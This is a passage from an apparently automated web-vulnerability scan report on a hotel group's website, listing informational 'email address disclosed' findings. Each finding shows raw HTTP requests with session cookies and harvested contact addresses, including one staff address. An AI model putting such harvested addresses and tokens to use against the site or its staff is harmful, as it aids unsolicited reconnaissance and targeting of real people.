Web: http://www.pod1.com
===================================
-->
...[SNIP]...
<a href="mailto:gifts@rchmail.com">gifts@rchmail.com</a>
...[SNIP]...
6.62. http://www.redcarnationhotels.com/our-hotels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-hotels

Issue detail

The following email address was disclosed in the response:

Request

GET /our-hotels HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:56 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=bb2b87faa4bf29db4a661df002d373ad; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>The Best Hotels in the World, 5
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.63. http://www.redcarnationhotels.com/our-responsibilities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities

Issue detail

The following email address was disclosed in the response:

Request

GET /our-responsibilities HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=d4906781592e1e5b19d7a052608c179a;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:58 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=7130d936a3463a6c8b92c51ea0b52718; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Corporate & Social Responsibili
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.64. http://www.redcarnationhotels.com/our-responsibilities/acting-global  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/acting-global

Issue detail

The following email address was disclosed in the response:

Request

GET /our-responsibilities/acting-global HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-responsibilities
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:13 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Acting Global - Corporate & Soc
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.65. http://www.redcarnationhotels.com/our-responsibilities/ark-foundation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/ark-foundation

Issue detail

The following email address was disclosed in the response:

Request

GET /our-responsibilities/ark-foundation HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:42:39 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:42:39 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Winners fo The ark Foundation C
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.66. http://www.redcarnationhotels.com/our-responsibilities/thinking-local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/thinking-local

Issue detail

The following email address was disclosed in the response:

Request

GET /our-responsibilities/thinking-local HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-responsibilities
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:16 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Thinking Local - Corporate & So
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.67. http://www.redcarnationhotels.com/our-responsibilities/working-together  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/working-together

Issue detail

The following email address was disclosed in the response:

Request

GET /our-responsibilities/working-together HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-responsibilities
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:19 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Working Together - Corporate &
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.68. http://www.redcarnationhotels.com/parties  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /parties

Issue detail

The following email addresses were disclosed in the response:

Request

GET /parties HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:23 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Children's Parties, Birthdays a
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
<a href="mailto:jshaw@rchmail.com">jshaw@rchmail.com</a>
...[SNIP]...
6.69. http://www.redcarnationhotels.com/partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /partners

Issue detail

The following email address was disclosed in the response:

Request

GET /partners HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:48 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=60761f2064b2ce5c95d191a87519b3d8; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Partners - Red Carnation Hotels
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.70. http://www.redcarnationhotels.com/press-room  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2c6114f0af7c1e2ab9c507aacb9f262c; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Press Area - London Luxury Hote
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.71. http://www.redcarnationhotels.com/press-room/awards--accolades  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/awards--accolades

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room/awards--accolades HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/press-room
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:34:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:34:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Awards & Accolades - Red Carnat
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.72. http://www.redcarnationhotels.com/press-room/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/contact-us

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room/contact-us HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/press-room
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:35:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:35:20 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Contact Us - London, Florida, G
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.73. http://www.redcarnationhotels.com/press-room/destination-news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/destination-news

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room/destination-news HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dcf5c90f1a028d2043f3c5286a13bdf1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:34:15 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:34:15 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=375ec69064b7f3e6fc2ffad07a3e5c1f; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Destination News - London, Flor
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.74. http://www.redcarnationhotels.com/press-room/podcasts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/podcasts

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room/podcasts HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/press-room
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:35:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:35:41 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Podcasts - London, Florida, Gen
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.75. http://www.redcarnationhotels.com/press-room/podcasts/roger_collis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/podcasts/roger_collis

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room/podcasts/roger_collis HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:35:47 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:35:47 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Roger's Archives - London, Flor
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.76. http://www.redcarnationhotels.com/press-room/podcasts/this-week-in-london  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/podcasts/this-week-in-london

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room/podcasts/this-week-in-london HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:36:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:36:03 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>This Week in London Podcasts -
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.77. http://www.redcarnationhotels.com/press-room/rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/rss

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room/rss HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/press-room
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:35:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:35:30 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Red Carnation Hotels RSS Press
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.78. http://www.redcarnationhotels.com/promoza  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /promoza

Issue detail

The following email address was disclosed in the response:

Request

GET /promoza HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-hotels
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:45:24 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:45:24 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Hotels South Africa | Bo
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.79. http://www.redcarnationhotels.com/refer-a-friend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /refer-a-friend

Issue detail

The following email address was disclosed in the response:

Request

GET /refer-a-friend HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:23 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=b215cb8e38815bbbb9fba59d31514955; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Send to a Friend</title>
<met
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.80. http://www.redcarnationhotels.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:17 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=94bca35a4d7c66899e27a596387efe0d; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22046

